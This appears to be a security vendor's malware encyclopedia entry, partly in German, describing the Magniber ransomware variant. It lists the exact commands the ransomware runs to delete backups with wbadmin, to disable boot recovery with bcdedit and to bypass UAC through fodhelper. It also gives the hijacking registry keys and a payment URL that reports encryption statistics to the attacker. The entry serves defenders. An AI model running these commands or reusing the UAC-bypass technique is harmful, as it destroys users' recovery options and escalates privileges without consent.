Ransom.JS.MAGNIBER.B

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Sammelt bestimmte Informationen auf dem betroffenen Computer.

Leitet Browser zu bestimmten Websites um.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Schleust die folgenden Dateien ein und führt sie aus:

• %Public%\{Random Characters}.pu → Encoded script that disables recovery boot and deletes system backups → Delete afterwards

Fügt die folgenden Prozesse hinzu:

• %System%\cmd.exe /c fodhelper.exe → to bypass UAC
• "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/{Random Characters}.pu
• bcdedit /set {default} recoveryenabled no
• wbadmin delete catalog -quiet
• wbadmin delete systemstatebackup -quiet
• bcdedit /set {default} bootstatuspolicy ignoreallfailures
• Open payment page through Microsoft Edge browser:
  • cmd /c "start microsoft-edge:http://{Random Characters}i{BLOCKED}t.elected.site/iijqvyt&{string 1}&{string 2}&{string 3}&{string 4}&{string 5}
  • where:
  • {string 1} - The number of drives in which the ransomware has enumerated files
  • {string 2} - Total size of encrypted data has generated in bytes
  • {string 3} - The number of files it encrypts
  • {string 4} - The number of file it enumerates
  • {string 5} - The build number of the compromised Windows OS

Fügt die folgenden Mutexe hinzu, damit nur jeweils eine ihrer Kopien ausgeführt wird:

• \BasedNameObjects\ggvqxaolnldlD

Injiziert Code in die folgenden Prozesse:

• It injects into each process if the following criteria is met:
  • The process is not iexplore.exe
  • It is not running in a WOW64 environment.

Andere Systemänderungen

Fügt die folgenden Registrierungseinträge hinzu:

HKEY_CURRENT_USER\SOFTWARE\Classes\
AppX04g0mbrz4mkc6e879rpf6qk6te730jfv\Shell\Open\
command
(Default) = wscript.exe /B /E:VBScript.Encode ../../Users/Public/{Random Characters}.pu

HKEY_CURRENT_USER\SOFTWARE\Classes\
AppX04g0mbrz4mkc6e879rpf6qk6te730jfv\Shell\Open\
command
DelegateExecute = 0

HKEY_CURRENT_USER\Software\Classes\
ms-settings\CurVer
Default = AppX04g0mbrz4mkc6e879rpf6qk6te730jfv

Datendiebstahl

Sammelt die folgenden Informationen auf dem betroffenen Computer:

• The number of drives in which the ransomware has enumerated files
• Total size of encrypted data has generated in bytes
• The number of files it encrypts
• The number of file it enumerates
• The build number of the compromised Windows OS

Andere Details

Leitet Browser zu folgenden Websites um:

• http://{Random Characters}i{BLOCKED}t.elected.site/iijqvyt&{string 1}&{string 2}&{string 3}&{string 4}&{string 5} → connects to payment page